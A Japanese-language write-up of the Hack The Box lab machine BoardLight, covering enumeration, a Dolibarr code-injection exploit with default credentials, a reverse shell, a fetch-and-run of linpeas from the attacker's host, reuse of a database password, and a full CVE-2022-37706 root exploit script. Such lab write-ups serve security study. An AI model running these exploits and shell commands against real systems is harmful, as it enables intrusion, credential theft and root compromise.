Season 5終わったので公開。 初参戦シーズンということもあってEASYしか解けなかったけど、今までの知識でなんとか出来た。
HTB: BoardLight
echo "10.10.11.11 board.htb" | sudo tee -a /etc/hosts
nmap
# nmap -sC -A board.htb PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 06:2d:3b:85:10:59:ff:73:66:27:7f:0e:ae:03:ea:f4 (RSA) | 256 59:03:dc:52:87:3a:35:99:34:44:74:33:78:31:35:fb (ECDSA) |_ 256 ab:13:38:e4:3e:e0:24:b4:69:38:a9:63:82:38:dd:f4 (ED25519) 80/tcp open http Apache httpd 2.4.41 ((Ubuntu)) |_http-title: Site doesn't have a title (text/html; charset=UTF-8). Aggressive OS guesses: Linux 4.15 - 5.8 (96%), Linux 5.3 - 5.4 (95%), Linux 2.6.32 (95%), Linux 5.0 - 5.5 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (95%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 5.0 (93%)
- 22: SSH
- 80: HTTP
標準構成
Web
- http://boardlight.htb
- Burp ONで見てみる
- フォームが1つ contact.php
action=""=> 実装されていない?- name属性もないので実装されてなさそう
# なんかコメントアウトされてるページがある <!-- <a class="nav-link" href="portfolio.php"> Portfolio </a> -->
- http://board.htb/portfolio.php
File not found.なさそうか- http://board.htb/404 => これはApacheの404
- http://board.htb/test.php => File not found.
- http://board.htb/_portfolio.php => 404
ffuf
# ffuf -w /usr/share/wordlists/dirb/common.txt -u http://board.htb/FUZZ.php
about [Status: 200, Size: 9100, Words: 3084, Lines: 281, Duration: 172ms]
contact [Status: 200, Size: 9426, Words: 3295, Lines: 295, Duration: 164ms]
do [Status: 200, Size: 9209, Words: 3173, Lines: 295, Duration: 291ms]
index [Status: 200, Size: 15949, Words: 6243, Lines: 518, Duration: 160ms]
# ffuf -w /usr/share/wordlists/dirb/common.txt -u http://board.htb/FUZZ
.htaccess [Status: 403, Size: 274, Words: 20, Lines: 10, Duration: 156ms]
.hta [Status: 403, Size: 274, Words: 20, Lines: 10, Duration: 156ms]
[Status: 200, Size: 15949, Words: 6243, Lines: 518, Duration: 309ms]
.htpasswd [Status: 403, Size: 274, Words: 20, Lines: 10, Duration: 157ms]
css [Status: 301, Size: 304, Words: 20, Lines: 10, Duration: 157ms]
images [Status: 301, Size: 307, Words: 20, Lines: 10, Duration: 156ms]
index.php [Status: 200, Size: 15949, Words: 6243, Lines: 518, Duration: 2280ms]
js [Status: 301, Size: 303, Words: 20, Lines: 10, Duration: 156ms]
server-status [Status: 403, Size: 274, Words: 20, Lines: 10, Duration: 165ms]
- 特に怪しいのはなし
- Webの問題ではないかも
CVE-2021-40438 => SSRF?
# whatweb -a 3 http://board.htb http://board.htb [200 OK] Apache[2.4.41], Bootstrap[4.3.1], Country[RESERVED][ZZ], Email[info@board.htb], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.41 (Ubuntu)], IP[10.10.11.11], JQuery[3.4.1], Script[text/javascript], X-UA-Compatible[IE=edge]
CVE-2021-40438=> SSRF脆弱性あり
# 中身はこれ GET http://board.htb/?unix:AA...AAAA|http://127.0.0.1:3000/ # pythonで実行している python3 CVE-2021-40438.py -t http://board.htb -ssrf http://10.10.16.22:8000 | head
- 成功しない 違うかも...
サブドメイン探索
board.htb とwebに書いてあるからサブドメインもあるか?
ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt \ -H "Host: FUZZ.board.htb" -u http://board.htb/ \ -fs 15949 crm [Status: 200, Size: 6360, Words: 397, Lines: 150, Duration: 6241ms]
あったわ。
echo "10.10.11.11 crm.board.htb" | sudo tee -a /etc/hosts
Dolibarr => CVE-2023-30253
- http://crm.board.htb/
- Dolibarr 17.0.0
- Login/Password
CVE-2023-30253
- PHP Code Injection
https://github.com/Dolibarr/dolibarr/issues/6568#issuecomment-1912088743
- admin/admin がデフォルト
- 入れた
Current login: admin
# nc -lnvp 4444 python3 exploit.py http://crm.board.htb admin admin 10.10.16.22 4444
yessss!
www-data@boardlight:~/html/crm.board.htb/htdocs/public/website$ pwd pwd /var/www/html/crm.board.htb/htdocs/public/website www-data@boardlight:~/html/crm.board.htb/htdocs/public/website$ whoami whoami www-data
www-data@boardlight:~$ ls -la /home ls -la /home total 12 drwxr-xr-x 3 root root 4096 May 17 01:04 . drwxr-xr-x 19 root root 4096 May 17 01:04 .. drwxr-x--- 16 larissa larissa 4096 Jun 25 03:33 larissa
larissa というのがユーザーっぽいけど、 www-data ではアクセスできない
linpears
www-data でアクセス出来そうなファイルを探す
# localでhostさせておく # python3 -m http.server 8000 curl http://10.10.16.22:8000/linpeas.sh|sh
# larissaのファイルがたくさん www-data@boardlight:~/html/board.htb$ -la ls -la total 72 drwxr-xr-x 5 www-data www-data 4096 May 17 01:04 . drwxr-xr-x 4 www-data www-data 4096 May 17 01:04 .. -rw-rw-r-- 1 larissa larissa 9100 May 15 11:01 about.php -rw-rw-r-- 1 larissa larissa 9426 May 15 11:02 contact.php drwxrwxr-x 2 larissa larissa 4096 May 17 01:04 css -rw-rw-r-- 1 larissa larissa 9209 May 15 11:02 do.php drwxrwxr-x 2 larissa larissa 4096 May 17 01:04 images -rw-rw-r-- 1 larissa larissa 15949 May 15 11:02 index.php drwxrwxr-x 2 larissa larissa 4096 May 17 01:04 js
# MySQL生きてそう tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN - # バックアップファイル => 収穫無し -r-------- 1 www-data www-data 16394 May 13 13:20 /var/www/html/crm.board.htb/htdocs/conf/conf.php.old
www-data@boardlight:~/html/crm.board.htb/htdocs/conf$ ls -la ls -la total 56 drwxr-xr-x 2 www-data www-data 4096 May 17 00:18 . drwxr-xr-x 79 www-data www-data 4096 Mar 4 2023 .. -rw-r--r-- 1 www-data www-data 31 Mar 4 2023 .htaccess -rw-r--r-- 1 www-data www-data 1736 May 17 00:18 conf.php -rw-r--r-- 1 www-data www-data 16394 Mar 4 2023 conf.php.example -r-------- 1 www-data www-data 16394 May 13 13:20 conf.php.old www-data@boardlight:~/html/crm.board.htb/htdocs/conf$ pwd pwd /var/www/html/crm.board.htb/htdocs/conf
# conf.php $dolibarr_main_db_name='dolibarr'; $dolibarr_main_db_user='dolibarrowner'; $dolibarr_main_db_pass='serverfun2$2023!!';
MySQL
# serverfun2$2023!!
mysql -u dolibarrowner -p dolibarr
# アカウントテーブル
SHOW TABLES;
=> llx_user
\g
SELECT * FROM llx_user\G;
*************************** 1. row ***************************
rowid: 1
...
login: dolibarr
pass_crypted: $2y$10$VevoimSke5Cd1/nX1Ql9Su6RstkTRe7UX1Or.cm8bZo56NjCMJzCm
pass_temp: NULL
api_key: NULL
lastname: SuperAdmin
*************************** 2. row ***************************
rowid: 2
...
login: admin
pass_crypted: $2y$10$gIEKOl7VZnr5KLbBDzGbL.YuJxwz5Sdl5ji3SEuiUSlULgAhhjH96
pass_temp: NULL
api_key: yr6V3pXd9QEI
lastname: admin
$2y$10$=> bcrypt
# => failed hashcat -m 3200 $2y$10$gIEKOl7VZnr5KLbBDzGbL.YuJxwz5Sdl5ji3SEuiUSlULgAhhjH96
user
- serverfun2$2023!! というパスワードはきっとヒント
- larissaでログインしてみたら入れた
ssh larissa@board.htb The authenticity of host 'board.htb (10.10.11.11)' can't be established. ED25519 key fingerprint is SHA256:xngtcDPqg6MrK72I6lSp/cKgP2kwzG6rx2rlahvu/v0. This key is not known by any other names. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added 'board.htb' (ED25519) to the list of known hosts. larissa@board.htb's password: Last login: Tue Jun 25 03:12:56 2024 from 10.10.14.116 larissa@boardlight:~$
larissa@boardlight:~$ cat user.txt XXXX
再び linpeas
- sudoers ではない
larissa@boardlight:~$ id uid=1000(larissa) gid=1000(larissa) groups=1000(larissa),4(adm) larissa@boardlight:~$ sudo -l [sudo] password for larissa: Sorry, user larissa may not run sudo on localhost.
さきほどのlinpeasの結果をもう一度見る
╔══════════╣ SUID - Check easy privesc, exploits and write perms ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid -rwsr-xr-x 1 root root 15K Jul 8 2019 /usr/lib/eject/dmcrypt-get-device -rwsr-sr-x 1 root root 15K Apr 8 18:36 /usr/lib/xorg/Xorg.wrap -rwsr-xr-x 1 root root 27K Jan 29 2020 /usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys (Unknown SUID binary!) -rwsr-xr-x 1 root root 15K Jan 29 2020 /usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_ckpasswd (Unknown SUID binary!) -rwsr-xr-x 1 root root 15K Jan 29 2020 /usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_backlight (Unknown SUID binary!) -rwsr-xr-x 1 root root 15K Jan 29 2020 /usr/lib/x86_64-linux-gnu/enlightenment/modules/cpufreq/linux-gnu-x86_64-0.23.1/freqset (Unknown SUID binary!)
enlightenment_sys とかいうの怪しい
Enlightenment => マシン名BoardLightだしたぶんこれっぽい
この通り実行していく
# check larissa@boardlight:~/tmp$ file /usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys /usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys: setuid ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=c32a8a1b279ba209d1029c51435d64b86ca09b8b, for GNU/Linux 3.2.0, stripped # 実行しても出力なし => OK larissa@boardlight:~/tmp$ /usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys larissa@boardlight:~/tmp$ # help => OK larissa@boardlight:~/tmp$ /usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys --help This is an internal tool for Enlightenment. do not use it.
# strace
larissa@boardlight:~/tmp$ strace /usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys 2>&1 | grep open
openat(AT_FDCWD, "/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3
openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libeina.so.1", O_RDONLY|O_CLOEXEC) = 3
openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libecore.so.1", O_RDONLY|O_CLOEXEC) = 3
openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libbluetooth.so.3", O_RDONLY|O_CLOEXEC) = 3
openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libpthread.so.0", O_RDONLY|O_CLOEXEC) = 3
openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libc.so.6", O_RDONLY|O_CLOEXEC) = 3
openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libm.so.6", O_RDONLY|O_CLOEXEC) = 3
openat(AT_FDCWD, "/lib/x86_64-linux-gnu/librt.so.1", O_RDONLY|O_CLOEXEC) = 3
openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libdl.so.2", O_RDONLY|O_CLOEXEC) = 3
openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libsystemd.so.0", O_RDONLY|O_CLOEXEC) = 3
openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libunwind-x86_64.so.8", O_RDONLY|O_CLOEXEC) = 3
openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libunwind.so.8", O_RDONLY|O_CLOEXEC) = 3
openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libeo.so.1", O_RDONLY|O_CLOEXEC) = 3
openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libefl.so.1", O_RDONLY|O_CLOEXEC) = 3
openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libglib-2.0.so.0", O_RDONLY|O_CLOEXEC) = 3
openat(AT_FDCWD, "/lib/x86_64-linux-gnu/liblzma.so.5", O_RDONLY|O_CLOEXEC) = 3
openat(AT_FDCWD, "/lib/x86_64-linux-gnu/liblz4.so.1", O_RDONLY|O_CLOEXEC) = 3
openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libgcrypt.so.20", O_RDONLY|O_CLOEXEC) = 3
openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libpcre.so.3", O_RDONLY|O_CLOEXEC) = 3
openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libgpg-error.so.0", O_RDONLY|O_CLOEXEC) = 3
# strace exec
larissa@boardlight:~/tmp$ strace /usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys 2>&1 | grep exec
execve("/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys", ["/usr/lib/x86_64-linux-gnu/enligh"...], 0x7ffc29275890 /* 18 vars */) = 0
syscallが成功している
larissa@boardlight:~/tmp$ cat ex.sh
#!/bin/bash
echo "CVE-2022-37706"
echo "[*] Trying to find the vulnerable SUID file..."
echo "[*] This may take few seconds..."
file=$(find / -name enlightenment_sys -perm -4000 2>/dev/null | head -1)
if [[ -z ${file} ]]
then
echo "[-] Couldn't find the vulnerable SUID file..."
echo "[*] Enlightenment should be installed on your system."
exit 1
fi
echo "[+] Vulnerable SUID binary found!"
echo "[+] Trying to pop a root shell!"
mkdir -p /tmp/net
mkdir -p "/dev/../tmp/;/tmp/exploit"
echo "/bin/sh" > /tmp/exploit
chmod a+x /tmp/exploit
echo "[+] Enjoy the root shell :)"
${file} /bin/mount -o noexec,nosuid,utf8,nodev,iocharset=utf8,utf8=0,utf8=1,uid=$(id -u), "/dev/../tmp/;/tmp/exploit" /tmp///net
larissa@boardlight:~/tmp$ sh ex.sh
CVE-2022-37706
[*] Trying to find the vulnerable SUID file...
[*] This may take few seconds...
ex.sh: 8: [[: not found
[+] Vulnerable SUID binary found!
[+] Trying to pop a root shell!
[+] Enjoy the root shell :)
mount: /dev/../tmp/: can't find in /etc/fstab.
# whoami root # cd /root/ # ls root.txt snap # cat root.txt XXXX
got it!
